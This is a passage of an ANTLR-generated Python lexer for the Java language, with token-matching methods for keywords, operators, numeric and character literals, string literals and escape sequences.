self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__161"
# $ANTLR start "T__162"
def mT__162(self, ):
try:
_type = T__162
_channel = DEFAULT_CHANNEL
# ./Java.g:60:8: ( 'finally' )
# ./Java.g:60:10: 'finally'
pass
self.match("finally")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__162"
# $ANTLR start "T__163"
def mT__163(self, ):
try:
_type = T__163
_channel = DEFAULT_CHANNEL
# ./Java.g:61:8: ( 'switch' )
# ./Java.g:61:10: 'switch'
pass
self.match("switch")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__163"
# $ANTLR start "T__164"
def mT__164(self, ):
try:
_type = T__164
_channel = DEFAULT_CHANNEL
# ./Java.g:62:8: ( 'synchronized' )
# ./Java.g:62:10: 'synchronized'
pass
self.match("synchronized")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__164"
# $ANTLR start "T__165"
def mT__165(self, ):
try:
_type = T__165
_channel = DEFAULT_CHANNEL
# ./Java.g:63:8: ( 'return' )
# ./Java.g:63:10: 'return'
pass
self.match("return")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__165"
# $ANTLR start "T__166"
def mT__166(self, ):
try:
_type = T__166
_channel = DEFAULT_CHANNEL
# ./Java.g:64:8: ( 'throw' )
# ./Java.g:64:10: 'throw'
pass
self.match("throw")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__166"
# $ANTLR start "T__167"
def mT__167(self, ):
try:
_type = T__167
_channel = DEFAULT_CHANNEL
# ./Java.g:65:8: ( 'break' )
# ./Java.g:65:10: 'break'
pass
self.match("break")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__167"
# $ANTLR start "T__168"
def mT__168(self, ):
try:
_type = T__168
_channel = DEFAULT_CHANNEL
# ./Java.g:66:8: ( 'continue' )
# ./Java.g:66:10: 'continue'
pass
self.match("continue")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__168"
# $ANTLR start "T__169"
def mT__169(self, ):
try:
_type = T__169
_channel = DEFAULT_CHANNEL
# ./Java.g:67:8: ( 'case' )
# ./Java.g:67:10: 'case'
pass
self.match("case")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__169"
# $ANTLR start "T__170"
def mT__170(self, ):
try:
_type = T__170
_channel = DEFAULT_CHANNEL
# ./Java.g:68:8: ( '+=' )
# ./Java.g:68:10: '+='
pass
self.match("+=")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__170"
# $ANTLR start "T__171"
def mT__171(self, ):
try:
_type = T__171
_channel = DEFAULT_CHANNEL
# ./Java.g:69:8: ( '-=' )
# ./Java.g:69:10: '-='
pass
self.match("-=")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__171"
# $ANTLR start "T__172"
def mT__172(self, ):
try:
_type = T__172
_channel = DEFAULT_CHANNEL
# ./Java.g:70:8: ( '*=' )
# ./Java.g:70:10: '*='
pass
self.match("*=")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__172"
# $ANTLR start "T__173"
def mT__173(self, ):
try:
_type = T__173
_channel = DEFAULT_CHANNEL
# ./Java.g:71:8: ( '/=' )
# ./Java.g:71:10: '/='
pass
self.match("/=")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__173"
# $ANTLR start "T__174"
def mT__174(self, ):
try:
_type = T__174
_channel = DEFAULT_CHANNEL
# ./Java.g:72:8: ( '&=' )
# ./Java.g:72:10: '&='
pass
self.match("&=")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__174"
# $ANTLR start "T__175"
def mT__175(self, ):
try:
_type = T__175
_channel = DEFAULT_CHANNEL
# ./Java.g:73:8: ( '|=' )
# ./Java.g:73:10: '|='
pass
self.match("|=")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__175"
# $ANTLR start "T__176"
def mT__176(self, ):
try:
_type = T__176
_channel = DEFAULT_CHANNEL
# ./Java.g:74:8: ( '^=' )
# ./Java.g:74:10: '^='
pass
self.match("^=")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__176"
# $ANTLR start "T__177"
def mT__177(self, ):
try:
_type = T__177
_channel = DEFAULT_CHANNEL
# ./Java.g:75:8: ( '%=' )
# ./Java.g:75:10: '%='
pass
self.match("%=")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__177"
# $ANTLR start "T__178"
def mT__178(self, ):
try:
_type = T__178
_channel = DEFAULT_CHANNEL
# ./Java.g:76:8: ( '||' )
# ./Java.g:76:10: '||'
pass
self.match("||")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__178"
# $ANTLR start "T__179"
def mT__179(self, ):
try:
_type = T__179
_channel = DEFAULT_CHANNEL
# ./Java.g:77:8: ( '&&' )
# ./Java.g:77:10: '&&'
pass
self.match("&&")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__179"
# $ANTLR start "T__180"
def mT__180(self, ):
try:
_type = T__180
_channel = DEFAULT_CHANNEL
# ./Java.g:78:8: ( '|' )
# ./Java.g:78:10: '|'
pass
self.match(124)
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__180"
# $ANTLR start "T__181"
def mT__181(self, ):
try:
_type = T__181
_channel = DEFAULT_CHANNEL
# ./Java.g:79:8: ( '^' )
# ./Java.g:79:10: '^'
pass
self.match(94)
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__181"
# $ANTLR start "T__182"
def mT__182(self, ):
try:
_type = T__182
_channel = DEFAULT_CHANNEL
# ./Java.g:80:8: ( '==' )
# ./Java.g:80:10: '=='
pass
self.match("==")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__182"
# $ANTLR start "T__183"
def mT__183(self, ):
try:
_type = T__183
_channel = DEFAULT_CHANNEL
# ./Java.g:81:8: ( '!=' )
# ./Java.g:81:10: '!='
pass
self.match("!=")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__183"
# $ANTLR start "T__184"
def mT__184(self, ):
try:
_type = T__184
_channel = DEFAULT_CHANNEL
# ./Java.g:82:8: ( 'instanceof' )
# ./Java.g:82:10: 'instanceof'
pass
self.match("instanceof")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__184"
# $ANTLR start "T__185"
def mT__185(self, ):
try:
_type = T__185
_channel = DEFAULT_CHANNEL
# ./Java.g:83:8: ( '+' )
# ./Java.g:83:10: '+'
pass
self.match(43)
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__185"
# $ANTLR start "T__186"
def mT__186(self, ):
try:
_type = T__186
_channel = DEFAULT_CHANNEL
# ./Java.g:84:8: ( '-' )
# ./Java.g:84:10: '-'
pass
self.match(45)
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__186"
# $ANTLR start "T__187"
def mT__187(self, ):
try:
_type = T__187
_channel = DEFAULT_CHANNEL
# ./Java.g:85:8: ( '/' )
# ./Java.g:85:10: '/'
pass
self.match(47)
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__187"
# $ANTLR start "T__188"
def mT__188(self, ):
try:
_type = T__188
_channel = DEFAULT_CHANNEL
# ./Java.g:86:8: ( '%' )
# ./Java.g:86:10: '%'
pass
self.match(37)
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__188"
# $ANTLR start "T__189"
def mT__189(self, ):
try:
_type = T__189
_channel = DEFAULT_CHANNEL
# ./Java.g:87:8: ( '++' )
# ./Java.g:87:10: '++'
pass
self.match("++")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__189"
# $ANTLR start "T__190"
def mT__190(self, ):
try:
_type = T__190
_channel = DEFAULT_CHANNEL
# ./Java.g:88:8: ( '--' )
# ./Java.g:88:10: '--'
pass
self.match("--")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__190"
# $ANTLR start "T__191"
def mT__191(self, ):
try:
_type = T__191
_channel = DEFAULT_CHANNEL
# ./Java.g:89:8: ( '~' )
# ./Java.g:89:10: '~'
pass
self.match(126)
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__191"
# $ANTLR start "T__192"
def mT__192(self, ):
try:
_type = T__192
_channel = DEFAULT_CHANNEL
# ./Java.g:90:8: ( '!' )
# ./Java.g:90:10: '!'
pass
self.match(33)
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__192"
# $ANTLR start "T__193"
def mT__193(self, ):
try:
_type = T__193
_channel = DEFAULT_CHANNEL
# ./Java.g:91:8: ( 'new' )
# ./Java.g:91:10: 'new'
pass
self.match("new")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__193"
# $ANTLR start "T__194"
def mT__194(self, ):
try:
_type = T__194
_channel = DEFAULT_CHANNEL
# ./Java.g:92:8: ( 'public' )
# ./Java.g:92:10: 'public'
pass
self.match("public")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__194"
# $ANTLR start "T__195"
def mT__195(self, ):
try:
_type = T__195
_channel = DEFAULT_CHANNEL
# ./Java.g:93:8: ( 'protected' )
# ./Java.g:93:10: 'protected'
pass
self.match("protected")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__195"
# $ANTLR start "T__196"
def mT__196(self, ):
try:
_type = T__196
_channel = DEFAULT_CHANNEL
# ./Java.g:94:8: ( 'private' )
# ./Java.g:94:10: 'private'
pass
self.match("private")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__196"
# $ANTLR start "T__197"
def mT__197(self, ):
try:
_type = T__197
_channel = DEFAULT_CHANNEL
# ./Java.g:95:8: ( 'abstract' )
# ./Java.g:95:10: 'abstract'
pass
self.match("abstract")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__197"
# $ANTLR start "T__198"
def mT__198(self, ):
try:
_type = T__198
_channel = DEFAULT_CHANNEL
# ./Java.g:96:8: ( 'final' )
# ./Java.g:96:10: 'final'
pass
self.match("final")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__198"
# $ANTLR start "T__199"
def mT__199(self, ):
try:
_type = T__199
_channel = DEFAULT_CHANNEL
# ./Java.g:97:8: ( 'native' )
# ./Java.g:97:10: 'native'
pass
self.match("native")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__199"
# $ANTLR start "T__200"
def mT__200(self, ):
try:
_type = T__200
_channel = DEFAULT_CHANNEL
# ./Java.g:98:8: ( 'transient' )
# ./Java.g:98:10: 'transient'
pass
self.match("transient")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__200"
# $ANTLR start "T__201"
def mT__201(self, ):
try:
_type = T__201
_channel = DEFAULT_CHANNEL
# ./Java.g:99:8: ( 'volatile' )
# ./Java.g:99:10: 'volatile'
pass
self.match("volatile")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__201"
# $ANTLR start "T__202"
def mT__202(self, ):
try:
_type = T__202
_channel = DEFAULT_CHANNEL
# ./Java.g:100:8: ( 'strictfp' )
# ./Java.g:100:10: 'strictfp'
pass
self.match("strictfp")
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "T__202"
# $ANTLR start "HexLiteral"
def mHexLiteral(self, ):
try:
_type = HexLiteral
_channel = DEFAULT_CHANNEL
# ./Java.g:1470:12: ( '0' ( 'x' | 'X' ) ( HexDigit )+ ( IntegerTypeSuffix )? )
# ./Java.g:1470:14: '0' ( 'x' | 'X' ) ( HexDigit )+ ( IntegerTypeSuffix )?
pass
self.match(48)
if self.input.LA(1) == 88 or self.input.LA(1) == 120:
self.input.consume()
else:
mse = MismatchedSetException(None, self.input)
self.recover(mse)
raise mse
# ./Java.g:1470:28: ( HexDigit )+
cnt1 = 0
while True: #loop1
alt1 = 2
LA1_0 = self.input.LA(1)
if ((48 <= LA1_0 <= 57) or (65 <= LA1_0 <= 70) or (97 <= LA1_0 <= 102)) :
alt1 = 1
if alt1 == 1:
# ./Java.g:1470:28: HexDigit
pass
self.mHexDigit()
else:
if cnt1 >= 1:
break #loop1
eee = EarlyExitException(1, self.input)
raise eee
cnt1 += 1
# ./Java.g:1470:38: ( IntegerTypeSuffix )?
alt2 = 2
LA2_0 = self.input.LA(1)
if (LA2_0 == 76 or LA2_0 == 108) :
alt2 = 1
if alt2 == 1:
# ./Java.g:1470:38: IntegerTypeSuffix
pass
self.mIntegerTypeSuffix()
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "HexLiteral"
# $ANTLR start "DecimalLiteral"
def mDecimalLiteral(self, ):
try:
_type = DecimalLiteral
_channel = DEFAULT_CHANNEL
# ./Java.g:1472:16: ( ( '0' | '1' .. '9' ( '0' .. '9' )* ) ( IntegerTypeSuffix )? )
# ./Java.g:1472:18: ( '0' | '1' .. '9' ( '0' .. '9' )* ) ( IntegerTypeSuffix )?
pass
# ./Java.g:1472:18: ( '0' | '1' .. '9' ( '0' .. '9' )* )
alt4 = 2
LA4_0 = self.input.LA(1)
if (LA4_0 == 48) :
alt4 = 1
elif ((49 <= LA4_0 <= 57)) :
alt4 = 2
else:
nvae = NoViableAltException("", 4, 0, self.input)
raise nvae
if alt4 == 1:
# ./Java.g:1472:19: '0'
pass
self.match(48)
elif alt4 == 2:
# ./Java.g:1472:25: '1' .. '9' ( '0' .. '9' )*
pass
self.matchRange(49, 57)
# ./Java.g:1472:34: ( '0' .. '9' )*
while True: #loop3
alt3 = 2
LA3_0 = self.input.LA(1)
if ((48 <= LA3_0 <= 57)) :
alt3 = 1
if alt3 == 1:
# ./Java.g:1472:34: '0' .. '9'
pass
self.matchRange(48, 57)
else:
break #loop3
# ./Java.g:1472:45: ( IntegerTypeSuffix )?
alt5 = 2
LA5_0 = self.input.LA(1)
if (LA5_0 == 76 or LA5_0 == 108) :
alt5 = 1
if alt5 == 1:
# ./Java.g:1472:45: IntegerTypeSuffix
pass
self.mIntegerTypeSuffix()
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "DecimalLiteral"
# $ANTLR start "OctalLiteral"
def mOctalLiteral(self, ):
try:
_type = OctalLiteral
_channel = DEFAULT_CHANNEL
# ./Java.g:1474:14: ( '0' ( '0' .. '7' )+ ( IntegerTypeSuffix )? )
# ./Java.g:1474:16: '0' ( '0' .. '7' )+ ( IntegerTypeSuffix )?
pass
self.match(48)
# ./Java.g:1474:20: ( '0' .. '7' )+
cnt6 = 0
while True: #loop6
alt6 = 2
LA6_0 = self.input.LA(1)
if ((48 <= LA6_0 <= 55)) :
alt6 = 1
if alt6 == 1:
# ./Java.g:1474:21: '0' .. '7'
pass
self.matchRange(48, 55)
else:
if cnt6 >= 1:
break #loop6
eee = EarlyExitException(6, self.input)
raise eee
cnt6 += 1
# ./Java.g:1474:32: ( IntegerTypeSuffix )?
alt7 = 2
LA7_0 = self.input.LA(1)
if (LA7_0 == 76 or LA7_0 == 108) :
alt7 = 1
if alt7 == 1:
# ./Java.g:1474:32: IntegerTypeSuffix
pass
self.mIntegerTypeSuffix()
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "OctalLiteral"
# $ANTLR start "HexDigit"
def mHexDigit(self, ):
try:
# ./Java.g:1477:10: ( ( '0' .. '9' | 'a' .. 'f' | 'A' .. 'F' ) )
# ./Java.g:1477:12: ( '0' .. '9' | 'a' .. 'f' | 'A' .. 'F' )
pass
if (48 <= self.input.LA(1) <= 57) or (65 <= self.input.LA(1) <= 70) or (97 <= self.input.LA(1) <= 102):
self.input.consume()
else:
mse = MismatchedSetException(None, self.input)
self.recover(mse)
raise mse
finally:
pass
# $ANTLR end "HexDigit"
# $ANTLR start "IntegerTypeSuffix"
def mIntegerTypeSuffix(self, ):
try:
# ./Java.g:1480:19: ( ( 'l' | 'L' ) )
# ./Java.g:1480:21: ( 'l' | 'L' )
pass
if self.input.LA(1) == 76 or self.input.LA(1) == 108:
self.input.consume()
else:
mse = MismatchedSetException(None, self.input)
self.recover(mse)
raise mse
finally:
pass
# $ANTLR end "IntegerTypeSuffix"
# $ANTLR start "FloatingPointLiteral"
def mFloatingPointLiteral(self, ):
try:
_type = FloatingPointLiteral
_channel = DEFAULT_CHANNEL
# ./Java.g:1483:5: ( ( '0' .. '9' )+ '.' ( '0' .. '9' )* ( Exponent )? ( FloatTypeSuffix )? | '.' ( '0' .. '9' )+ ( Exponent )? ( FloatTypeSuffix )? | ( '0' .. '9' )+ Exponent ( FloatTypeSuffix )? | ( '0' .. '9' )+ FloatTypeSuffix )
alt18 = 4
alt18 = self.dfa18.predict(self.input)
if alt18 == 1:
# ./Java.g:1483:9: ( '0' .. '9' )+ '.' ( '0' .. '9' )* ( Exponent )? ( FloatTypeSuffix )?
pass
# ./Java.g:1483:9: ( '0' .. '9' )+
cnt8 = 0
while True: #loop8
alt8 = 2
LA8_0 = self.input.LA(1)
if ((48 <= LA8_0 <= 57)) :
alt8 = 1
if alt8 == 1:
# ./Java.g:1483:10: '0' .. '9'
pass
self.matchRange(48, 57)
else:
if cnt8 >= 1:
break #loop8
eee = EarlyExitException(8, self.input)
raise eee
cnt8 += 1
self.match(46)
# ./Java.g:1483:25: ( '0' .. '9' )*
while True: #loop9
alt9 = 2
LA9_0 = self.input.LA(1)
if ((48 <= LA9_0 <= 57)) :
alt9 = 1
if alt9 == 1:
# ./Java.g:1483:26: '0' .. '9'
pass
self.matchRange(48, 57)
else:
break #loop9
# ./Java.g:1483:37: ( Exponent )?
alt10 = 2
LA10_0 = self.input.LA(1)
if (LA10_0 == 69 or LA10_0 == 101) :
alt10 = 1
if alt10 == 1:
# ./Java.g:1483:37: Exponent
pass
self.mExponent()
# ./Java.g:1483:47: ( FloatTypeSuffix )?
alt11 = 2
LA11_0 = self.input.LA(1)
if (LA11_0 == 68 or LA11_0 == 70 or LA11_0 == 100 or LA11_0 == 102) :
alt11 = 1
if alt11 == 1:
# ./Java.g:1483:47: FloatTypeSuffix
pass
self.mFloatTypeSuffix()
elif alt18 == 2:
# ./Java.g:1484:9: '.' ( '0' .. '9' )+ ( Exponent )? ( FloatTypeSuffix )?
pass
self.match(46)
# ./Java.g:1484:13: ( '0' .. '9' )+
cnt12 = 0
while True: #loop12
alt12 = 2
LA12_0 = self.input.LA(1)
if ((48 <= LA12_0 <= 57)) :
alt12 = 1
if alt12 == 1:
# ./Java.g:1484:14: '0' .. '9'
pass
self.matchRange(48, 57)
else:
if cnt12 >= 1:
break #loop12
eee = EarlyExitException(12, self.input)
raise eee
cnt12 += 1
# ./Java.g:1484:25: ( Exponent )?
alt13 = 2
LA13_0 = self.input.LA(1)
if (LA13_0 == 69 or LA13_0 == 101) :
alt13 = 1
if alt13 == 1:
# ./Java.g:1484:25: Exponent
pass
self.mExponent()
# ./Java.g:1484:35: ( FloatTypeSuffix )?
alt14 = 2
LA14_0 = self.input.LA(1)
if (LA14_0 == 68 or LA14_0 == 70 or LA14_0 == 100 or LA14_0 == 102) :
alt14 = 1
if alt14 == 1:
# ./Java.g:1484:35: FloatTypeSuffix
pass
self.mFloatTypeSuffix()
elif alt18 == 3:
# ./Java.g:1485:9: ( '0' .. '9' )+ Exponent ( FloatTypeSuffix )?
pass
# ./Java.g:1485:9: ( '0' .. '9' )+
cnt15 = 0
while True: #loop15
alt15 = 2
LA15_0 = self.input.LA(1)
if ((48 <= LA15_0 <= 57)) :
alt15 = 1
if alt15 == 1:
# ./Java.g:1485:10: '0' .. '9'
pass
self.matchRange(48, 57)
else:
if cnt15 >= 1:
break #loop15
eee = EarlyExitException(15, self.input)
raise eee
cnt15 += 1
self.mExponent()
# ./Java.g:1485:30: ( FloatTypeSuffix )?
alt16 = 2
LA16_0 = self.input.LA(1)
if (LA16_0 == 68 or LA16_0 == 70 or LA16_0 == 100 or LA16_0 == 102) :
alt16 = 1
if alt16 == 1:
# ./Java.g:1485:30: FloatTypeSuffix
pass
self.mFloatTypeSuffix()
elif alt18 == 4:
# ./Java.g:1486:9: ( '0' .. '9' )+ FloatTypeSuffix
pass
# ./Java.g:1486:9: ( '0' .. '9' )+
cnt17 = 0
while True: #loop17
alt17 = 2
LA17_0 = self.input.LA(1)
if ((48 <= LA17_0 <= 57)) :
alt17 = 1
if alt17 == 1:
# ./Java.g:1486:10: '0' .. '9'
pass
self.matchRange(48, 57)
else:
if cnt17 >= 1:
break #loop17
eee = EarlyExitException(17, self.input)
raise eee
cnt17 += 1
self.mFloatTypeSuffix()
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "FloatingPointLiteral"
# $ANTLR start "Exponent"
def mExponent(self, ):
try:
# ./Java.g:1490:10: ( ( 'e' | 'E' ) ( '+' | '-' )? ( '0' .. '9' )+ )
# ./Java.g:1490:12: ( 'e' | 'E' ) ( '+' | '-' )? ( '0' .. '9' )+
pass
if self.input.LA(1) == 69 or self.input.LA(1) == 101:
self.input.consume()
else:
mse = MismatchedSetException(None, self.input)
self.recover(mse)
raise mse
# ./Java.g:1490:22: ( '+' | '-' )?
alt19 = 2
LA19_0 = self.input.LA(1)
if (LA19_0 == 43 or LA19_0 == 45) :
alt19 = 1
if alt19 == 1:
# ./Java.g:
pass
if self.input.LA(1) == 43 or self.input.LA(1) == 45:
self.input.consume()
else:
mse = MismatchedSetException(None, self.input)
self.recover(mse)
raise mse
# ./Java.g:1490:33: ( '0' .. '9' )+
cnt20 = 0
while True: #loop20
alt20 = 2
LA20_0 = self.input.LA(1)
if ((48 <= LA20_0 <= 57)) :
alt20 = 1
if alt20 == 1:
# ./Java.g:1490:34: '0' .. '9'
pass
self.matchRange(48, 57)
else:
if cnt20 >= 1:
break #loop20
eee = EarlyExitException(20, self.input)
raise eee
cnt20 += 1
finally:
pass
# $ANTLR end "Exponent"
# $ANTLR start "FloatTypeSuffix"
def mFloatTypeSuffix(self, ):
try:
# ./Java.g:1493:17: ( ( 'f' | 'F' | 'd' | 'D' ) )
# ./Java.g:1493:19: ( 'f' | 'F' | 'd' | 'D' )
pass
if self.input.LA(1) == 68 or self.input.LA(1) == 70 or self.input.LA(1) == 100 or self.input.LA(1) == 102:
self.input.consume()
else:
mse = MismatchedSetException(None, self.input)
self.recover(mse)
raise mse
finally:
pass
# $ANTLR end "FloatTypeSuffix"
# $ANTLR start "CharacterLiteral"
def mCharacterLiteral(self, ):
try:
_type = CharacterLiteral
_channel = DEFAULT_CHANNEL
# ./Java.g:1496:5: ( '\\'' ( EscapeSequence | ~ ( '\\'' | '\\\\' ) ) '\\'' )
# ./Java.g:1496:9: '\\'' ( EscapeSequence | ~ ( '\\'' | '\\\\' ) ) '\\''
pass
self.match(39)
# ./Java.g:1496:14: ( EscapeSequence | ~ ( '\\'' | '\\\\' ) )
alt21 = 2
LA21_0 = self.input.LA(1)
if (LA21_0 == 92) :
alt21 = 1
elif ((0 <= LA21_0 <= 38) or (40 <= LA21_0 <= 91) or (93 <= LA21_0 <= 65534)) :
alt21 = 2
else:
nvae = NoViableAltException("", 21, 0, self.input)
raise nvae
if alt21 == 1:
# ./Java.g:1496:16: EscapeSequence
pass
self.mEscapeSequence()
elif alt21 == 2:
# ./Java.g:1496:33: ~ ( '\\'' | '\\\\' )
pass
if (0 <= self.input.LA(1) <= 38) or (40 <= self.input.LA(1) <= 91) or (93 <= self.input.LA(1) <= 65534):
self.input.consume()
else:
mse = MismatchedSetException(None, self.input)
self.recover(mse)
raise mse
self.match(39)
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "CharacterLiteral"
# $ANTLR start "StringLiteral"
def mStringLiteral(self, ):
try:
_type = StringLiteral
_channel = DEFAULT_CHANNEL
# ./Java.g:1500:5: ( '\"' ( EscapeSequence | ~ ( '\\\\' | '\"' ) )* '\"' )
# ./Java.g:1500:8: '\"' ( EscapeSequence | ~ ( '\\\\' | '\"' ) )* '\"'
pass
self.match(34)
# ./Java.g:1500:12: ( EscapeSequence | ~ ( '\\\\' | '\"' ) )*
while True: #loop22
alt22 = 3
LA22_0 = self.input.LA(1)
if (LA22_0 == 92) :
alt22 = 1
elif ((0 <= LA22_0 <= 33) or (35 <= LA22_0 <= 91) or (93 <= LA22_0 <= 65534)) :
alt22 = 2
if alt22 == 1:
# ./Java.g:1500:14: EscapeSequence
pass
self.mEscapeSequence()
elif alt22 == 2:
# ./Java.g:1500:31: ~ ( '\\\\' | '\"' )
pass
if (0 <= self.input.LA(1) <= 33) or (35 <= self.input.LA(1) <= 91) or (93 <= self.input.LA(1) <= 65534):
self.input.consume()
else:
mse = MismatchedSetException(None, self.input)
self.recover(mse)
raise mse
else:
break #loop22
self.match(34)
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "StringLiteral"
# $ANTLR start "EscapeSequence"
def mEscapeSequence(self, ):
try:
# ./Java.g:1505:5: ( '\\\\' ( 'b' | 't' | 'n' | 'f' | 'r' | '\\\"' | '\\'' | '\\\\' ) | UnicodeEscape | OctalEscape )
alt23 = 3
LA23_0 = self.input.LA(1)
if (LA23_0 == 92) :
LA23 = self.input.LA(2)
if LA23 == 34 or LA23 == 39 or LA23 == 92 or LA23 == 98 or LA23 == 102 or LA23 == 110 or LA23 == 114 or LA23 == 116:
alt23 = 1
elif LA23 == 117:
alt23 = 2
elif LA23 == 48 or LA23 == 49 or LA23 == 50 or LA23 == 51 or LA23 == 52 or LA23 == 53 or LA23 == 54 or LA23 == 55:
alt23 = 3
else:
nvae = NoViableAltException("", 23, 1, self.input)
raise nvae
else:
nvae = NoViableAltException("", 23, 0, self.input)
raise nvae
if alt23 == 1:
# ./Java.g:1505:9: '\\\\' ( 'b' | 't' | 'n' | 'f' | 'r' | '\\\"' | '\\'' | '\\\\' )
pass
self.match(92)
if self.input.LA(1) == 34 or self.input.LA(1) == 39 or self.input.LA(1) == 92 or self.input.LA(1) == 98 or self.input.LA(1) == 102 or self.input.LA(1) == 110 or self.input.LA(1) == 114 or self.input.LA(1) == 116:
self.input.consume()
else:
mse = MismatchedSetException(None, self.input)
self.recover(mse)
raise mse
elif alt23 == 2:
# ./Java.g:1506:9: UnicodeEscape
pass
self.mUnicodeEscape()
elif alt23 == 3:
# ./Java.g:1507:9: OctalEscape
pass
self.mOctalEscape()
finally:
pass
# $ANTLR end "EscapeSequence"
# $ANTLR start "OctalEscape"
def mOctalEscape(self, ):
try:
# ./Java.g:1512:5: ( '\\\\' ( '0' .. '3' ) ( '0' .. '7' ) ( '0' .. '7' ) | '\\\\' ( '0' .. '7' ) ( '0' .. '7' ) | '\\\\' ( '0' .. '7' ) )
alt24 = 3
LA24_0 = self.input.LA(1)
if (LA24_0 == 92) :
LA24_1 = self.input.LA(2)
if ((48 <= LA24_1 <= 51)) :
LA24_2 = self.input.LA(3)
if ((48 <= LA24_2 <= 55)) :
LA24_5 = self.input.LA(4)
if ((48 <= LA24_5 <= 55)) :
alt24 = 1
else:
alt24 = 2
else:
alt24 = 3
elif ((52 <= LA24_1 <= 55)) :
LA24_3 = self.input.LA(3)
if ((48 <= LA24_3 <= 55)) :
alt24 = 2
else:
alt24 = 3
else:
nvae = NoViableAltException("", 24, 1, self.input)
raise nvae
else:
nvae = NoViableAltException("", 24, 0, self.input)
raise nvae
if alt24 == 1:
# ./Java.g:1512:9: '\\\\' ( '0' .. '3' ) ( '0' .. '7' ) ( '0' .. '7' )
pass
self.match(92)
# ./Java.g:1512:14: ( '0' .. '3' )
# ./Java.g:1512:15: '0' .. '3'
pass
self.matchRange(48, 51)
# ./Java.g:1512:25: ( '0' .. '7' )
# ./Java.g:1512:26: '0' .. '7'
pass
self.matchRange(48, 55)
# ./Java.g:1512:36: ( '0' .. '7' )
# ./Java.g:1512:37: '0' .. '7'
pass
self.matchRange(48, 55)
elif alt24 == 2:
# ./Java.g:1513:9: '\\\\' ( '0' .. '7' ) ( '0' .. '7' )
pass
self.match(92)
# ./Java.g:1513:14: ( '0' .. '7' )
# ./Java.g:1513:15: '0' .. '7'
pass
self.matchRange(48, 55)
# ./Java.g:1513:25: ( '0' .. '7' )
# ./Java.g:1513:26: '0' .. '7'
pass
self.matchRange(48, 55)
elif alt24 == 3:
# ./Java.g:1514:9: '\\\\' ( '0' .. '7' )
pass
self.match(92)
# ./Java.g:1514:14: ( '0' .. '7' )
# ./Java.g:1514:15: '0' .. '7'
pass
self.matchRange(48, 55)
finally:
pass
# $ANTLR end "OctalEscape"
# $ANTLR start "UnicodeEscape"
def mUnicodeEscape(self, ):
try:
# ./Java.g:1519:5: ( '\\\\' 'u' HexDigit HexDigit HexDigit HexDigit )
# ./Java.g:1519:9: '\\\\' 'u' HexDigit HexDigit HexDigit HexDigit
pass
self.match(92)
self.match(117)
self.mHexDigit()
self.mHexDigit()
self.mHexDigit()
self.mHexDigit()
finally:
pass
# $ANTLR end "UnicodeEscape"
# $ANTLR start "ENUM"
def mENUM(self, ):
try:
_type = ENUM
_channel = DEFAULT_CHANNEL
# ./Java.g:1522:5: ( 'enum' )
# ./Java.g:1522:9: 'enum'
pass
self.match("enum")
#action start
if not self.enumIsKeyword:
    _type = Identifier
#action end
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "ENUM"
# $ANTLR start "ASSERT"
def mASSERT(self, ):
try:
_type = ASSERT
_channel = DEFAULT_CHANNEL
# ./Java.g:1530:5: ( 'assert' )
# ./Java.g:1530:9: 'assert'
pass
